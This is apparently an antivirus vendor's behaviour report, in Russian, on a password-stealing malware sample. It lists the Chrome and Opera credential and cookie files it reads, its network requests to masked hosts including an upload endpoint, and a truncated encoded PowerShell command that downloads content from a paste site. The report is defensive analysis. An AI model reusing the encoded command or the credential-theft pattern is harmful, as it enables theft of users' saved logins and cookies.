Техническая информация
Вредоносные функции
Читает файлы, отвечающие за хранение паролей сторонними программами
- %LOCALAPPDATA%\google\chrome\user data\default\login data
- %APPDATA%\opera software\opera stable\login data
- %LOCALAPPDATA%\google\chrome\user data\default\cookies
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\34586.txt
Удаляет следующие файлы
- %TEMP%\34586.txt
Сетевая активность
Подключается к
- 'ra####.#00webhostapp.com':80
TCP
Запросы HTTP GET
- http://dp##te.com/FZ5J5E6Q3.txt
- http://ra####.#00webhostapp.com/index.php?me#####################################################################################################################################################...
Запросы HTTP POST
- http://ra####.#00webhostapp.com/upload.php
UDP
- DNS ASK dp##te.com
- DNS ASK ap#.#y-ip.io
- DNS ASK ra####.#00webhostapp.com
Другое
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBkAHAAYQBzAHQAZQAuAGMAbwBtAC8AOQB...
